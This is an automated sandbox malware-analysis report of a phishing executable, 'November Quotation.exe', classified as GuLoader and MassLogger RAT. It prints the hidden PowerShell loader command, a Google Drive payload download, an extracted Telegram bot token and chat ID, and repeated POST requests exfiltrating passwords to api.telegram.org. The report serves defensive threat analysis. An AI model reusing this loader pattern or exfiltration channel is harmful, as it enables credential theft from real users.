Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
November Quotation.exe

Overview

General Information

Sample name:November Quotation.exe
Analysis ID:1562309
MD5:ebfe0469ca7e7a5ca4957b72bf4b1a48
SHA1:a5abd780240905f85846a2eb91b17ffbfed640ab
SHA256:5d68fc50b0a3cef7accabd9c3195998c04a0adae0a7e8b3fac3881f5c5397305
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • November Quotation.exe (PID: 7800 cmdline: "C:\Users\user\Desktop\November Quotation.exe" MD5: EBFE0469CA7E7A5CA4957B72BF4B1A48)
    • powershell.exe (PID: 7864 cmdline: powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6492 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"EXfil Mode": "Telegram", "Telegram Token": "7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8", "Telegram Chatid": "6283883842"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2561413904.0000000005439000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000002.00000002.1865707382.000000000A569000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 6492JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 172.217.19.174, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6492, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49838
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7864, TargetFilename: C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) ", CommandLine: powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\November Quotation.exe", ParentImage: C:\Users\user\Desktop\November Quotation.exe, ParentProcessId: 7800, ParentProcessName: November Quotation.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) ", ProcessId: 7864, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T13:47:43.098496+010020577441Malware Command and Control Activity Detected192.168.2.949871149.154.167.220443TCP
          2024-11-25T13:47:46.772175+010020577441Malware Command and Control Activity Detected192.168.2.949881149.154.167.220443TCP
          2024-11-25T13:47:50.431287+010020577441Malware Command and Control Activity Detected192.168.2.949891149.154.167.220443TCP
          2024-11-25T13:47:53.739392+010020577441Malware Command and Control Activity Detected192.168.2.949902149.154.167.220443TCP
          2024-11-25T13:47:57.177157+010020577441Malware Command and Control Activity Detected192.168.2.949909149.154.167.220443TCP
          2024-11-25T13:48:00.630012+010020577441Malware Command and Control Activity Detected192.168.2.949921149.154.167.220443TCP
          2024-11-25T13:48:04.249756+010020577441Malware Command and Control Activity Detected192.168.2.949929149.154.167.220443TCP
          2024-11-25T13:48:07.632635+010020577441Malware Command and Control Activity Detected192.168.2.949940149.154.167.220443TCP
          2024-11-25T13:48:10.896009+010020577441Malware Command and Control Activity Detected192.168.2.949947149.154.167.220443TCP
          2024-11-25T13:48:14.213747+010020577441Malware Command and Control Activity Detected192.168.2.949958149.154.167.220443TCP
          2024-11-25T13:48:17.661828+010020577441Malware Command and Control Activity Detected192.168.2.949966149.154.167.220443TCP
          2024-11-25T13:48:21.001411+010020577441Malware Command and Control Activity Detected192.168.2.949977149.154.167.220443TCP
          2024-11-25T13:48:24.453386+010020577441Malware Command and Control Activity Detected192.168.2.949985149.154.167.220443TCP
          2024-11-25T13:48:27.885837+010020577441Malware Command and Control Activity Detected192.168.2.949996149.154.167.220443TCP
          2024-11-25T13:48:31.633855+010020577441Malware Command and Control Activity Detected192.168.2.950004149.154.167.220443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T13:47:38.326543+010028032742Potentially Bad Traffic192.168.2.949859193.122.130.080TCP
          2024-11-25T13:47:40.889059+010028032742Potentially Bad Traffic192.168.2.949859193.122.130.080TCP
          2024-11-25T13:47:44.623459+010028032742Potentially Bad Traffic192.168.2.949877193.122.130.080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T13:47:31.093531+010028032702Potentially Bad Traffic192.168.2.949838172.217.19.174443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8", "Telegram Chatid": "6283883842"}
          Source: C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exeReversingLabs: Detection: 60%
          Source: November Quotation.exeReversingLabs: Detection: 60%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: November Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49865 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49848 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49871 version: TLS 1.2
          Source: Binary string: tem.Core.pdbD source: powershell.exe, 00000002.00000002.1862036159.000000000734E000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_004060E4 FindFirstFileW,FindClose,0_2_004060E4
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405629
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 029FEF21h5_2_029FEC70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h5_2_26E644C8

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49871 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49940 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49891 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49921 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49996 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49977 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49909 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49929 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49902 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49958 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49966 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49947 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49881 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50004 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49985 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0d256fd4fb43Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0d509daf7ed8Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0d7a2473be4aHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0d9de9eedfb2Host: api.telegram.orgContent-Length: 1089
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0dc438f2f66dHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0dea4ec4d08dHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0e1435d6b8b6Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0e387c56ffd5Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0e5c8ddae85bHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0e7f163530ddHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0ea2bd3f0271Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0ec7800118d6Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0ef14330ed3dHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0f1d5bb4e543Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0f4e57a81a2bHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49859 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49877 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49838 -> 172.217.19.174:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49865 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd0d256fd4fb43Host: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
